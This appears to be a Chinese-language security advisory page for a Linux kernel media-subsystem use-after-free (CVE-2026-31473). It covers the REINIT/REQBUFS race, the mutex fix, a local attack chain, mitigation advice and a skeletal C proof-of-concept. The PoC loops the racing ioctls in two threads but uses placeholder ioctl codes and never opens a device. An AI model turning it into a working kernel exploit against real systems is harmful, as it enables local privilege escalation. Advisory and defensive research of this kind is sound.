CVE-2026-31473 CVSS 7.8 高危

CVE-2026-31473 Linux内核媒体子系统UAF漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31473

漏洞类型

释放后重用

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核媒体子系统中存在一个高危漏洞。该漏洞源于MEDIA_REQUEST_IOC_REINIT与VIDIOC_REQBUFS(0)队列拆除路径之间的竞态条件。当这两个操作并发执行时，可能导致请求对象清理与vb2队列取消之间的竞争，进而引发释放后重用漏洞。攻击者可利用此漏洞造成系统崩溃或执行任意代码。

技术细节

该漏洞位于Linux内核的媒体（MC）和V4L2子系统中。问题核心在于`media_request_ioctl_reinit`（处理MEDIA_REQUEST_IOC_REINIT）与`VIDIOC_REQBUFS(0)`（用于释放缓冲区）之间缺乏必要的同步机制。当这两个操作同时发生时，一个操作可能正在清理请求对象，而另一个操作正在取消vb2队列。这种并发执行触发了竞态条件，导致程序访问已被释放的内存（Use-After-Free）。尽管内核已经使用`req_queue_mutex`来序列化请求队列与STREAMON/OFF的操作，但并未将其扩展到REQBUFS和REINIT操作。修复方案是通过在`media_request_ioctl_reinit`和REQBUFS相关路径中获取`req_queue_mutex`锁，确保这些操作在同一互斥域内串行执行，从而防止并行运行导致的内存安全问题。

攻击链分析

STEP 1

步骤1：访问

攻击者获取本地系统的低权限访问权限（AV:L/PR:L）。

STEP 2

步骤2：触发竞态

攻击者并发调用MEDIA_REQUEST_IOC_REINIT和VIDIOC_REQBUFS(0)两个IOCTL命令。

STEP 3

步骤3：利用漏洞

由于缺乏互斥锁保护，REINIT操作在REQBUFS释放内存后尝试访问该内存，导致Use-After-Free。

STEP 4

步骤4：达成目标

成功利用该漏洞可能导致内核崩溃（DoS）或进一步实现权限提升（RCE/EoP）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <pthread.h>

// Conceptual Proof of Concept for CVE-2026-31473
// This code demonstrates the race condition between
// MEDIA_REQUEST_IOC_REINIT and VIDIOC_REQBUFS(0).

#define MEDIA_REQUEST_IOC_REINIT 0x0
#define VIDIOC_REQBUFS 0x0

int fd;

void *thread_reinit(void *arg) {
    while (1) {
        // Continuously trigger REINIT ioctl
        // This races with the queue teardown in the other thread
        ioctl(fd, MEDIA_REQUEST_IOC_REINIT, 0);
    }
    return NULL;
}

void *thread_reqbufs(void *arg) {
    struct v4l2_requestbuffers reqbufs = {0};
    reqbufs.count = 0; // Teardown the queue
    reqbufs.type = V4L2_BUF_TYPE_VIDEO_OUTPUT;
    
    while (1) {
        // Continuously trigger REQBUFS(0) ioctl
        // This releases memory that REINIT might try to access
        ioctl(fd, VIDIOC_REQBUFS, &reqbufs);
    }
    return NULL;
}

int main() {
    // Setup: Open a vulnerable media device
    // fd = open("/dev/video0", O_RDWR);
    // Implementation requires a specific device supporting requests

    pthread_t t1, t2;
    pthread_create(&t1, NULL, thread_reinit, NULL);
    pthread_create(&t2, NULL, thread_reqbufs, NULL);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    
    close(fd);
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

限制低权限用户对媒体设备（/dev/video*, /dev/media*）的访问权限，或暂时禁用相关的V4L2驱动程序以减少攻击面，直至内核完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表